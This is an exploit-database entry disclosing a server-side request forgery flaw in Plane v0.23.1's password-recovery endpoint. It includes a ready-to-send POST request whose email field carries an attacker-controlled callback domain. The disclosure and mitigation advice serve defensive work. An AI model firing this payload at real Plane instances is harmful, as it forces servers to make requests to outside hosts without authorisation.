Plane - Server Side Request Forgery (SSRF)

vendor:

Plane

by:

Saud Alenazi

7.1

CVSS

HIGH

Server Side Request Forgery (SSRF)

918

CWE

Product Name: Plane

Affected Version From: v0.23.1

Affected Version To: v0.23.1

Patch Exists: NO

Related CWE: CVE-2024-XXXX (To be assigned)

CPE: a:makeplane:plane:0.23.1

Metasploit:

Other Scripts:

Platforms Tested: Windows 10 x64

2024

Plane – Server Side Request Forgery (SSRF)

A Server-Side Request Forgery (SSRF) vulnerability was found in the password recovery feature of Plane application. This vulnerability enables attackers to manipulate the email input field and insert a payload to force the server to send HTTP requests to domains controlled by the attacker.

Mitigation:

To mitigate this vulnerability, validate and sanitize user inputs before processing them. Additionally, restrict the server from making requests to external domains.

Source

Exploit-DB raw data:

# Exploit Title: Plane - Server side request forgery (SSRF)
# Date: 2024-01-13
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://plane.so
# Software Link: https://github.com/makeplane/plane/releases/tag/v0.23.1
# Version: v0.23.1
# Tested: Windows 10 x64

Description:

A Server-Side Request Forgery (SSRF) vulnerability has been identified in the Plane application's password recovery functionality. The issue allows attackers to manipulate the email input field and inject a payload to make the server send HTTP requests to attacker-controlled domains.

Steps to Reproduce:

1- Go to the password recovery or login section where the email input is required.

2- Inject the following payload in the email field, replacing the domain with a server you control:

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

Send the request:

POST /auth/magic-generate/ HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Content-Length: 62

{"email":"user@lvkrx2ib577fgpfxvq0f9ek0oruiiagy5.oastify.com"}

3- Monitor your controlled server to observe the incoming HTTP request from the vulnerable system.